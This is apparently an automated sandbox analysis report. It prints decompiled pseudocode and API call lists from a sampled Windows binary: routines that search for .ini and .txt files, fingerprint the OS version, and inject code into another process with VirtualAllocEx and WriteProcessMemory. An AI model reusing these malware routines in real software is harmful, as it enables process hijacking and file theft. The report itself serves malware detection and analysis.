0x005ca905
0x005ca908
0x005ca90a
0x005ca90b
0x005ca90f
0x005ca910
0x005ca911
0x005ca916
0x005ca919
0x005ca921
0x005ca92b
0x00000000
0x00000000
0x005ca92d
0x005ca930
0x005ca934
0x005ca93e
0x005ca946
0x005ca95e
0x005ca962
0x005ca963
0x005ca964
0x005ca965
0x005ca966
0x005ca96e
0x005ca97f
0x005ca983
0x005ca984
0x005ca985
0x005ca986
0x005ca987
0x005ca98c
0x005ca993
0x005ca993
0x00000000
0x005ca934
0x005ca7b8
0x005ca7bc
0x005ca7bf
0x005ca7c2
0x005ca7c4
0x005ca7c5
0x005ca7c9
0x005ca7cc
0x00000000
0x00000000
0x005ca7ce
0x005ca7d1
0x005ca7d7
0x00000000
0x00000000
0x00000000
0x005ca7d7
0x00000000
0x005ca65d
0x005ca665
0x005ca66d
0x005ca66f
0x005ca67b
0x005ca680
0x005ca683
0x005ca683
0x005ca685
0x005ca685
0x005ca685
0x005ca685
0x005ca68e
0x005ca693
0x005ca695
0x005ca699
0x005ca69d
0x005ca6a1
0x005ca6a5
0x005ca6a6
0x005ca6aa
0x00000000
0x005ca685
0x005ca65b
0x005ca565
0x005ca4ed
0x005ca502
0x005ca50d
0x005ca511
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005CA558

Part of subcall function 005C8160: GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169

CloseHandle.KERNEL32(?), ref: 005CA897

Strings

HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT, xrefs: 005CA675

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseCountCreateFileHandleTick
String ID: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT
API String ID: 1536596348-2016521663
Opcode ID: 9f1588081c890fdbde6a2c3ffc677863fddf901eb221f512a1ce1adac877be03
Instruction ID: 7157ab78d72ca2f56c91de55ef6a9b20996e4c84234467e2c2267fa5e1136457
Opcode Fuzzy Hash: 9f1588081c890fdbde6a2c3ffc677863fddf901eb221f512a1ce1adac877be03
Instruction Fuzzy Hash: E4D104B1A042096FD721ABA49C46F7B7FD9FFC4718F09452DF84997282EA309D05C792

Uniqueness

Uniqueness Score: -1.00%

Function 005CC7C0, Relevance: 4.7, APIs: 3, Instructions: 222
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E005CC7C0() {
				void* _t70;
				void** _t71;
				void* _t73;
				void* _t74;
				int _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;
				void* _t83;
				intOrPtr _t84;
				short* _t86;
				signed short* _t88;
				void* _t90;
				signed int _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void** _t96;
				signed int _t97;
				void* _t98;
				void* _t101;
				signed short* _t102;
				signed int _t103;
				signed int _t104;
				void** _t105;
				void* _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				struct _WIN32_FIND_DATAW* _t113;
				signed int _t120;
				void** _t124;

				_t93 = _t124[0x29c];
				_t108 = 0;
				if(_t93 != 0) {
					_t70 = _t124[0x29b];
					 *0x5d9bd4 = _t93;
					_t94 = 0xfffffc00;
					while(1) {
						_t103 =  *(_t70 + _t94 + 0x400) & 0x0000ffff;
						if(_t103 == 0) {
							break;
						}
						 *(_t124 + _t94 + 0x658) = _t103;
						_t94 = _t94 + 2;
						if(_t94 != 0) {
							continue;
						} else {
							 *((short*)(_t124 + _t94 + 0x656)) = 0;
						}
						goto L67;
					}
					 *(_t124 + _t94 + 0x658) = 0;
					_t71 =  &(_t124[0x96]);
					_t95 = 0x200;
					while( *_t71 != 0) {
						_t71 =  &(_t71[0]);
						_t95 = _t95 - 1;
						if(_t95 != 0) {
							continue;
						} else {
						}
						goto L67;
					}
					_t111 = 0;
					while(1) {
						_t104 = _t111;
						_t13 = _t111 + 0x5d9ba4; // 0x2a005c
						_t112 =  *(_t111 + _t13) & 0x0000ffff;
						if(_t112 == 0) {
							break;
						}
						 *(_t71 + _t104 * 2) = _t112;
						_t16 = _t104 + 1; // 0x1
						_t111 = _t16;
						if(_t95 != _t111) {
							continue;
						} else {
							L12:
							 *(_t71 + _t104 * 2) = 0;
							L13:
							_t108 = 0;
						}
						goto L67;
					}
					_t113 =  &(_t124[2]);
					 *(_t71 + _t104 * 2) = 0;
					_t73 = FindFirstFileW( &(_t124[0x96]), _t113);
					_t108 = 0;
					 *_t124 = _t73;
					if(_t73 != 0xffffffff) {
						_t74 = 0xfffffc00;
						while( *((short*)(_t124 + _t74 + 0x658)) != 0) {
							_t74 = _t74 + 2;
							if(_t74 != 0) {
								continue;
							} else {
							}
							goto L67;
						}
						 *((short*)(_t124 + _t74 + 0x656)) = 0;
						do {
							_t108 = 0;
							if((_t124[2] & 0x00000010) != 0) {
								goto L64;
							} else {
								_t77 = 0;
								_t105 =  &(_t124[0xc]);
								_t96 =  &(_t124[0xd]);
								while( *_t96 != 0) {
									_t77 = _t77 + 2;
									_t96 =  &(_t96[0]);
									_t105 =  &(_t105[0]);
									if(_t77 != 0x400) {
										continue;
									} else {
										L51:
										_t108 = 0;
										goto L64;
									}
									goto L67;
								}
								_t88 = _t96 - 2;
								_t108 = 0;
								if(_t88 <=  &(_t124[0xd])) {
									goto L64;
								} else {
									_t108 = 0;
									_t120 = 0;
									if(( *_t88 & 0x0000ffff) != 0x2e) {
										_t92 = 1;
										while(1) {
											_t102 = _t105;
											_t120 = _t92;
											if(_t102 <=  &(_t124[0xd])) {
												break;
											}
											_t60 = _t120 + 1; // 0x2
											_t92 = _t60;
											_t105 = _t102 - 2;
											if(( *_t102 & 0x0000ffff) != 0x2e) {
												continue;
											}
											break;
										}
										_t96 =  &(_t102[1]);
										_t113 =  &(_t124[2]);
									}
									if(_t120 != 3) {
										goto L64;
									} else {
										_t106 =  *_t96;
										if(_t106 == 0x6e0069) {
											if(_t96[1] != 0x69) {
												goto L64;
											} else {
												goto L21;
											}
										} else {
											if(_t106 != 0x780074) {
												goto L64;
											} else {
												if(_t96[1] == 0x74) {
													L21:
													_t78 = E005C3180(_t77, 0);
													_t124 =  &(_t124[2]);
													if(_t78 == 0) {
														goto L64;
													} else {
														_t79 = 0xfffffc00;
														while(1) {
															_t97 =  *(_t124 + _t79 + 0x658) & 0x0000ffff;
															if(_t97 == 0) {
																break;
															}
															 *(_t124 + _t79 + 0xa58) = _t97;
															_t79 = _t79 + 2;
															if(_t79 != 0) {
																continue;
															} else {
																 *((short*)(_t124 + _t79 + 0xa56)) = 0;
																goto L13;
															}
															goto L67;
														}
														 *(_t124 + _t79 + 0xa58) = 0;
														_t98 = 0x200;
														_t71 =  &(_t124[0x196]);
														while( *_t71 != 0) {
															_t71 =  &(_t71[0]);
															_t108 = 0;
															_t98 = _t98 - 1;
															if(_t98 != 0) {
																continue;
															} else {
															}
															goto L67;
														}
														_t109 = 0;
														while(1) {
															_t104 = _t109;
															_t110 =  *(_t124 + 0x34 + _t109 * 2) & 0x0000ffff;
															if(_t110 == 0) {
																break;
															}
															 *(_t71 + _t104 * 2) = _t110;
															_t40 = _t104 + 1; // 0x1
															_t109 = _t40;
															if(_t98 != _t109) {
																continue;
															} else {
																goto L12;
															}
															goto L67;
														}
														 *(_t71 + _t104 * 2) = 0;
														_push(0);
														_push( &(_t124[0x197]));
														_t81 = E005CC510( &(_t124[0x197]), _t98);
														_t124 =  &(_t124[2]);
														if(_t81 == 0) {
															goto L51;
														} else {
															_t108 = _t81;
															_t90 = 2;
															_t83 = 0xffffffffffffffff;
															while( *((short*)(_t124 + _t90 + 0x656)) != 0) {
																_t83 = _t83 - 1;
																_t90 = _t90 + 2;
																if(_t83 != 0xfffffdff) {
																	continue;
																} else {
																}
																goto L67;
															}
															_t124[1] = _t83;
															_t84 =  *0x5d9b40; // 0x0
															if(_t84 != 0) {
																E005C91E0(_t84);
																_t124 =  &(_t124[1]);
															}
															_t86 = E005C3180(_t90, 0);
															_t124 =  &(_t124[2]);
															 *0x5d9b40 = _t86;
															if( ~(_t124[1]) <= 0) {
																if(_t90 != 0) {
																	 *_t86 = 0;
																}
															} else {
																_t101 = 0;
																while(1) {
																	_t107 =  *(_t124 + _t101 + 0x658) & 0x0000ffff;
																	if(_t107 == 0) {
																		break;
																	}
																	 *(_t86 + _t101) = _t107;
																	_t101 = _t101 + 2;
																	if(_t90 != _t101) {
																		continue;
																	} else {
																		 *((short*)(_t86 + _t101 - 2)) = 0;
																	}
																	goto L67;
																}
																 *(_t86 + _t101) = 0;
																goto L64;
															}
														}
													}
												} else {
													goto L64;
												}
											}
										}
									}
								}
							}
							goto L67;
							L64:
							_t75 = FindNextFileW(_t124[1], _t113);
						} while (_t108 == 0 && _t75 != 0);
						FindClose( *_t124);
					}
				}
				L67:
				return _t108;
			}

0x005cc7ca
0x005cc7d1
0x005cc7d5
0x005cc7db
0x005cc7e2
0x005cc7e8
0x005cc7ed
0x005cc7ed
0x005cc7f8
0x00000000
0x00000000
0x005cc7fa
0x005cc802
0x005cc805
0x00000000
0x005cc807
0x005cc807
0x005cc807
0x00000000
0x005cc805
0x005cc816
0x005cc820
0x005cc827
0x005cc82c
0x005cc832
0x005cc835
0x005cc836
0x00000000
0x00000000
0x005cc838
0x00000000
0x005cc836
0x005cc83d
0x005cc83f
0x005cc83f
0x005cc841
0x005cc841
0x005cc84c
0x00000000
0x00000000
0x005cc84e
0x005cc852
0x005cc852
0x005cc857
0x00000000
0x005cc859
0x005cc859
0x005cc859
0x005cc85f
0x005cc85f
0x005cc85f
0x00000000
0x005cc857
0x005cc866
0x005cc86a
0x005cc879
0x005cc87f
0x005cc884
0x005cc887
0x005cc88d
0x005cc892
0x005cc89d
0x005cc8a0
0x00000000
0x00000000
0x005cc8a2
0x00000000
0x005cc8a0
0x005cc8ad
0x005cc9ee
0x005cc9f3
0x005cc9f8
0x00000000
0x005cc9fe
0x005cc9fe
0x005cca00
0x005cca04
0x005cca08
0x005cca0e
0x005cca11
0x005cca14
0x005cca1c
0x00000000
0x005cca1e
0x005cca1e
0x005cca1e
0x00000000
0x005cca1e
0x00000000
0x005cca1c
0x005cca24
0x005cca2b
0x005cca37
0x00000000
0x005cca39
0x005cca3c
0x005cca3e
0x005cca46
0x005cca4a
0x005cca4b
0x005cca4b
0x005cca51
0x005cca55
0x00000000
0x00000000
0x005cca5a
0x005cca5a
0x005cca5d
0x005cca63
0x00000000
0x00000000
0x00000000
0x005cca63
0x005cca65
0x005cca68
0x005cca68
0x005cca6f
0x00000000
0x005cca71
0x005cca71
0x005cca79
0x005cc8c6
0x00000000
0x00000000
0x00000000
0x00000000
0x005cca7f
0x005cca8b
0x00000000
0x005cca8d
0x005cca91
0x005cc8cc
0x005cc8cf
0x005cc8d4
0x005cc8d9
0x00000000
0x005cc8df
0x005cc8df
0x005cc8e4
0x005cc8e4
0x005cc8ef
0x00000000
0x00000000
0x005cc8f1
0x005cc8f9
0x005cc8fc
0x00000000
0x005cc8fe
0x005ccac8
0x00000000
0x005ccac8
0x00000000
0x005cc8fc
0x005cc903
0x005cc90d
0x005cc912
0x005cc919
0x005cc91f
0x005cc922
0x005cc924
0x005cc925
0x00000000
0x00000000
0x005cc927
0x00000000
0x005cc925
0x005cc92c
0x005cc92e
0x005cc92e
0x005cc930
0x005cc938
0x00000000
0x00000000
0x005cc93a
0x005cc93e
0x005cc93e
0x005cc943
0x00000000
0x005cc945
0x00000000
0x005cc945
0x00000000
0x005cc943
0x005cc94a
0x005cc950
0x005cc959
0x005cc95a
0x005cc95f
0x005cc964
0x00000000
0x005cc96a
0x005cc96a
0x005cc96e
0x005cc973
0x005cc974
0x005cc97f
0x005cc980
0x005cc988
0x00000000
0x00000000
0x005cc98a
0x00000000
0x005cc988
0x005cc98f
0x005cc993
0x005cc99a
0x005cc99d
0x005cc9a2
0x005cc9a2
0x005cc9a9
0x005cc9ae
0x005cc9b5
0x005cc9be
0x005ccae2
0x005ccae4
0x005ccae4
0x005cc9c4
0x005cc9c4
0x005cc9c6
0x005cc9c6
0x005cc9d1
0x00000000
0x00000000
0x005cc9d3
0x005cc9d7
0x005cc9dc
0x00000000
0x005cc9de
0x005ccad7
0x005ccad7
0x00000000
0x005cc9dc
0x005cc9e3
0x00000000
0x005cc9e3
0x005cc9be
0x005cc964
0x005cca97
0x00000000
0x005cca97
0x005cca91
0x005cca8b
0x005cca79
0x005cca6f
0x005cca37
0x00000000
0x005cca9f
0x005ccaa4
0x005ccaa6
0x005ccab5
0x005ccab5
0x005cc887
0x005ccabb
0x005ccac7

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005CC879
FindNextFileW.KERNEL32(?,?), ref: 005CCAA4
FindClose.KERNEL32 ref: 005CCAB5

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Find$FileHeap$AllocateCloseFirstNextProcess
String ID:
API String ID: 2373226758-0
Opcode ID: 954c3b78368ccd6b565e5be55263905b5ef90b821538fad857b3e49073d0df77
Instruction ID: 67cef79809c8ff55a3755a9b5bc408f43831a2fe0b6dc04b5af8e7573cfeb04f
Opcode Fuzzy Hash: 954c3b78368ccd6b565e5be55263905b5ef90b821538fad857b3e49073d0df77
Instruction Fuzzy Hash: 9881CF715083098ED730DB94DC49FABBFA6FF90304F19482ED84E8B2A1EB759841D392

Uniqueness

Uniqueness Score: -1.00%

Function 005C1FB0, Relevance: 4.7, APIs: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E005C1FB0() {
				char _v208;
				char _v408;
				char _v410;
				signed short _v416;
				signed int _v684;
				intOrPtr _v688;
				char _v692;
				char _v892;
				struct _OSVERSIONINFOW* _t40;
				intOrPtr _t44;
				signed int _t45;
				char* _t46;
				char* _t49;
				void* _t51;
				signed int _t59;
				void* _t67;
				struct _SYSTEM_INFO* _t68;

				_t40 =  &_v692;
				_t40->dwOSVersionInfoSize = 0x11c;
				GetVersionExW(_t40);
				if( *((intOrPtr*)( *0x5d9d64)) == 0) {
					GetSystemInfo(_t68);
				} else {
					 *0x5d9d64(_t68);
				}
				_t44 = _v688;
				if(_t44 == 5) {
					_t45 = _v684;
					if(_t45 == 0) {
						_t46 =  &_v892;
						_push(0xa8);
						goto L30;
					}
					if(_t45 == 1) {
						_t46 =  &_v892;
						_push(0xa7);
						goto L30;
					}
					if(_t45 != 2) {
						goto L29;
					}
					_t46 =  &_v892;
					_push(0xab);
				} else {
					if(_t44 == 6) {
						_t59 = _v684;
						if(_t59 > 3) {
							L29:
							_t46 =  &_v892;
							_push(0x9f);
							L30:
							_push(_t46);
							E005D4520();
							if((_t68->lpMinimumApplicationAddress & 0x0000ffff) != 9) {
								_t49 =  &_v408;
								_push(0xad);
							} else {
								_t49 =  &_v408;
								_push(0xae);
							}
							_push(_t49);
							E005D4520();
							_t51 = E005C3180(0x100, 0);
							if(_t51 == 0) {
								_t67 = 0;
							} else {
								_t67 = _t51;
								if(_v416 == 0) {
									E005D4520( &_v208, 0x2f);
									_push( &_v408);
									E005D68E0(_t67, 0x100,  &_v208,  &_v892);
								} else {
									E005D4520( &_v208, 0xaf);
									_push(_v416 & 0x0000ffff);
									_push( &_v408);
									E005D68E0(_t67, 0x100,  &_v208,  &_v892);
								}
							}
							return _t67;
						}
						switch( *((intOrPtr*)(_t59 * 4 +  &M005C2220))) {
							case 0:
								if(_v410 != 1) {
									_t46 =  &_v892;
									_push(0xa1);
									goto L30;
								}
								if(_v410 != 1) {
									goto L29;
								}
								_t46 =  &_v892;
								_push(0xaa);
								goto L30;
							case 1:
								if(_v410 != 1) {
									_push(0xa0);
									goto L30;
								}
								if(_v410 != 1) {
									goto L29;
								}
								_push(0xa4);
								goto L30;
							case 2:
								if(_v410 != 1) {
									_push(0xa3);
									goto L30;
								}
								if(_v410 != 1) {
									goto L29;
								}
								_push(0xa6);
								goto L30;
							case 3:
								if(_v410 != 1) {
									_push(0xa2);
									goto L30;
								}
								if(_v410 != 1) {
									goto L29;
								}
								_push(0xa5);
								goto L30;
						}
					}
					if(_t44 != 0xa) {
						goto L29;
					}
					if(_v410 != 1) {
						_t46 =  &_v892;
						_push(0xa9);
					} else {
						_t46 =  &_v892;
						_push(0xac);
					}
				}
			}

0x005c1fb8
0x005c1fbf
0x005c1fc6
0x005c1fd4
0x005c1fe4
0x005c1fd6
0x005c1fd9
0x005c1fd9
0x005c1fea
0x005c1ff4
0x005c201c
0x005c2025
0x005c2092
0x005c2096
0x00000000
0x005c2096
0x005c202a
0x005c209d
0x005c20a1
0x00000000
0x005c20a1
0x005c202f
0x00000000
0x00000000
0x005c2035
0x005c2039
0x005c1ff6
0x005c1ff9
0x005c2043
0x005c204d
0x005c2111
0x005c2111
0x005c2115
0x005c211a
0x005c211a
0x005c211b
0x005c212a
0x005c213a
0x005c2141
0x005c212c
0x005c212c
0x005c2133
0x005c2133
0x005c2146
0x005c2147
0x005c2156
0x005c2160
0x005c21ab
0x005c2162
0x005c216b
0x005c216d
0x005c21b9
0x005c21cc
0x005c21d5
0x005c216f
0x005c217c
0x005c2197
0x005c2198
0x005c21a1
0x005c21a6
0x005c216d
0x005c21e7
0x005c21e7
0x005c2053
0x00000000
0x005c2062
0x005c2204
0x005c2208
0x00000000
0x005c2208
0x005c2070
0x00000000
0x00000000
0x005c2076
0x005c207a
0x00000000
0x00000000
0x005c20f6
0x005c2216
0x00000000
0x005c2216
0x005c2104
0x00000000
0x00000000
0x005c210a
0x00000000
0x00000000
0x005c20b0
0x005c21ec
0x00000000
0x005c21ec
0x005c20be
0x00000000
0x00000000
0x005c20c4
0x00000000
0x00000000
0x005c20d3
0x005c21fa
0x00000000
0x005c21fa
0x005c20e1
0x00000000
0x00000000
0x005c20e7
0x00000000
0x00000000
0x005c2053
0x005c1ffe
0x00000000
0x00000000
0x005c200c
0x005c2084
0x005c2088
0x005c200e
0x005c200e
0x005c2012
0x005c2012
0x005c200c

APIs

GetVersionExW.KERNEL32(?), ref: 005C1FC6
GetNativeSystemInfo.KERNEL32 ref: 005C1FD9
GetSystemInfo.KERNEL32 ref: 005C1FE4

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: InfoSystem$NativeVersion
String ID:
API String ID: 2201459028-0
Opcode ID: f47d77caa4ebed72f2fd60479935d7f9c12b55fbd27c709dd42e3bcfc0243f46
Instruction ID: 3d612933a3e930c77a31359a85fa2df58f1778e703308f2f0d7880a8052eab30
Opcode Fuzzy Hash: f47d77caa4ebed72f2fd60479935d7f9c12b55fbd27c709dd42e3bcfc0243f46
Instruction Fuzzy Hash: 6251833260C384AEE631C695DC4AFAB7FD8BB96704F08091FF68496082E3B0DA44D753

Uniqueness

Uniqueness Score: -1.00%

Function 005C9CD0, Relevance: 4.5, APIs: 3, Instructions: 44
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C9CD0(void* __eax, void* _a4, void* _a8, long _a12) {
				void* _t5;
				void* _t10;
				SIZE_T* _t11;
				void* _t12;
				void* _t13;
				long _t14;
				SIZE_T* _t15;

				_t14 = _a12;
				_t10 = _a4;
				_t5 = VirtualAllocEx(_t10, 0, _t14, 0x3000, 0x40);
				_t13 = 0;
				if(_t5 != 0) {
					_t12 = _t5;
					_t11 = _t15;
					 *_t11 = 0;
					if(WriteProcessMemory(_t10, _t12, _a8, _t14, _t11) == 0 ||  *_t15 != _t14) {
						VirtualFreeEx(_t10, _t12, 0, 0x8000);
					} else {
						_t13 = _t12;
					}
				}
				return _t13;
			}

0x005c9cd5
0x005c9cd9
0x005c9ce8
0x005c9cee
0x005c9cf2
0x005c9cf4
0x005c9cfa
0x005c9cfc
0x005c9d0f
0x005c9d23
0x005c9d16
0x005c9d16
0x005c9d16
0x005c9d0f
0x005c9d32

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D23

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessWrite
String ID:
API String ID: 3247110995-0
Opcode ID: e61a91aa5269a8144fd6352a65fde7eee7e7cc359513a2da5511482180a78dc7
Instruction ID: 44dd4e77c0ce28ac895e09e980546e316561cd8836b3a4d7cf53524b1e82c642
Opcode Fuzzy Hash: e61a91aa5269a8144fd6352a65fde7eee7e7cc359513a2da5511482180a78dc7
Instruction Fuzzy Hash: 95F090B2241304BFE2305B66DC49F177F9CFB89B95F21042EFA46A6280D570EC04C671

Uniqueness

Uniqueness Score: -1.00%

Function 005C3180, Relevance: 4.5, APIs: 3, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C3180(signed int _a4, void* _a8) {
				void* _t3;
				long _t9;
				signed int _t10;
				void* _t11;

				_t3 =  *0x5d9c2c; // 0x230000
				_t11 = _a8;
				_t10 = _a4;
				if(_t3 == 0) {
					_t3 = GetProcessHeap();
					 *0x5d9c2c = _t3;
				}
				_t9 = ( ~_t10 & 0x0000000f) + _t10;
				if(_t11 == 0) {
					return RtlAllocateHeap(_t3, 8, _t9);
				} else {
					return RtlReAllocateHeap(_t3, 8, _t11, _t9);
				}
			}

0x005c3182
0x005c3187
0x005c318b
0x005c3191
0x005c3193
0x005c3199
0x005c3199
0x005c31a5
0x005c31a9
0x00000000
0x005c31ab
0x00000000
0x005c31b0

APIs

GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
RtlAllocateHeap.NTDLL(00230000,00000008,?), ref: 005C31BC

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Heap$Allocate$Process
String ID:
API String ID: 980559045-0
Opcode ID: 3f4248359b9ea1d13bf8fe64649434834ee35c03843735ebf09ce33b0bc7a6b2
Instruction ID: fb6bd6b1dab2198527e5a95d99b1f6c0ceaf73acee1920f970c0770c599a80bf
Opcode Fuzzy Hash: 3f4248359b9ea1d13bf8fe64649434834ee35c03843735ebf09ce33b0bc7a6b2
Instruction Fuzzy Hash: 95E065B2651210AFDB249B65EC09F5A7B98FBA4711B0C850FF401D7250DA705C049B60

Uniqueness

Uniqueness Score: -1.00%

Function 005D5EB0, Relevance: 4.3, APIs: 3, Instructions: 524
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E005D5EB0(void* __ecx, void* __eflags) {
				signed char* _t133;
				intOrPtr _t134;
				signed int _t135;
				void* _t140;
				signed char _t144;
				signed char* _t146;
				signed char _t158;
				signed int _t161;
				intOrPtr _t163;
				signed int _t164;
				signed int _t165;
				signed int _t172;
				intOrPtr _t173;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				intOrPtr _t184;
				signed char* _t185;
				signed int _t186;
				void* _t187;
				signed int _t188;
				signed int _t190;
				signed int _t192;
				signed int _t193;
				signed int _t195;
				intOrPtr _t196;
				signed int _t197;
				signed char* _t198;
				signed int _t199;
				intOrPtr _t200;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int* _t214;
				intOrPtr _t215;
				signed char* _t218;
				signed int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				WCHAR* _t229;
				signed int _t230;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				intOrPtr _t244;
				signed char* _t249;
				intOrPtr* _t250;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr _t254;
				intOrPtr _t255;
				signed int* _t258;
				signed int _t262;
				signed int* _t264;
				intOrPtr _t266;
				intOrPtr _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				signed int _t273;
				signed char _t274;
				intOrPtr _t276;
				intOrPtr* _t277;
				signed int _t280;
				signed int _t284;
				signed int* _t285;
				void* _t286;
				signed int* _t290;
				signed int _t291;
				void* _t292;
				signed char _t293;
				signed int _t294;
				void* _t295;
				WCHAR* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed char* _t303;
				void* _t306;
				void* _t307;
				signed int* _t308;
				signed int* _t309;
				signed int* _t310;
				signed int* _t312;
				signed int* _t313;

				_t286 = __ecx;
				_t235 = 0;
				_t302 = _t306 + 0x14;
				E005D6610(_t306 + 0x14, 0, 0x63c);
				_t307 = _t306 + 0xc;
				_t133 =  *0x5d9c08; // 0x27a400
				_t133[0x490] = 0;
				_t244 =  *0x5d9b0c; // 0x26f2b8
				 *(_t244 + 8) = 1;
				_t4 = _t244 + 0x24; // 0x0
				_t134 =  *_t4;
				if(_t134 == 0) {
					 *(_t244 + 8) = 2;
					_t135 = E005C5B70(0x83);
					_t308 = _t307 + 4;
					_t308[0xe] = _t135;
					L39:
					_t292 =  &(_t308[0x74]);
					_t303 =  *0x5d9c08; // 0x27a400
					_t62 =  &(_t303[0x10]); // 0x27a410
					_t303[8] =  *(_t292 - 0x188);
					_t303[0x494] =  *(_t292 - 0x198);
					_t303[0xc] =  *(_t292 - 0x19c);
					_t140 = memcpy(_t62, _t292, 0x20 << 2);
					_t309 =  &(_t308[3]);
					E005CC400(_t140,  &(_t309[0x94]), 0x400);
					_t310 =  &(_t309[3]);
					_t142 =  *_t303;
					if( *_t303 != 0) {
						E005C91E0(_t142);
						_t310 =  &(_t310[1]);
						_t303 =  *0x5d9c08; // 0x27a400
					}
					_t71 =  &(_t303[4]); // 0x0
					_t143 =  *_t71;
					if( *_t71 != 0) {
						E005C91E0(_t143);
						_t310 =  &(_t310[1]);
					}
					_t248 = _t310[7];
					_t293 = 0;
					_t144 = 0;
					if(_t310[7] != 0) {
						_t144 = E005CB7A0(_t248);
						_t310 =  &(_t310[1]);
					}
					_t249 =  *0x5d9c08; // 0x27a400
					 *_t249 = _t144;
					_t145 = _t310[8];
					if(_t310[8] != 0) {
						_t158 = E005CB7A0(_t145);
						_t310 =  &(_t310[1]);
						_t293 = _t158;
					}
					_t146 =  *0x5d9c08; // 0x27a400
					_t146[4] = _t293;
					if(_t310[5] == 0) {
						L50:
						_t147 = _t310[0x10];
						if(_t310[0x10] != 0) {
							E005C91E0(_t147);
							_t310 =  &(_t310[1]);
						}
						_t148 = _t310[0xf];
						if(_t310[0xf] != 0) {
							E005C91E0(_t148);
							_t310 =  &(_t310[1]);
						}
						_t149 = _t310[6];
						if(_t310[6] != 0) {
							E005C91E0(_t149);
							_t310 =  &(_t310[1]);
						}
						_t150 = _t310[0xb];
						if(_t310[0xb] != 0) {
							E005C91E0(_t150);
						}
						return _t235;
					} else {
						_t294 = 0;
						do {
							E005C91E0( *((intOrPtr*)(_t310[6] + _t294 * 4)));
							_t310 =  &(_t310[1]);
							_t294 = _t294 + 1;
						} while (_t294 < _t310[5]);
						goto L50;
					}
				}
				_t250 = _t307 + 0x650;
				_t295 = _t307 + 0x18;
				 *_t250 = 0x20;
				_push(0xffffffff);
				_push(_t295);
				_push(_t250);
				_push(_t134);
				_t161 = E005C9FF0();
				_t312 = _t307 + 0x10;
				 *(_t295 - 4) = _t161;
				if((_t161 & 0xfffffffe) != 2) {
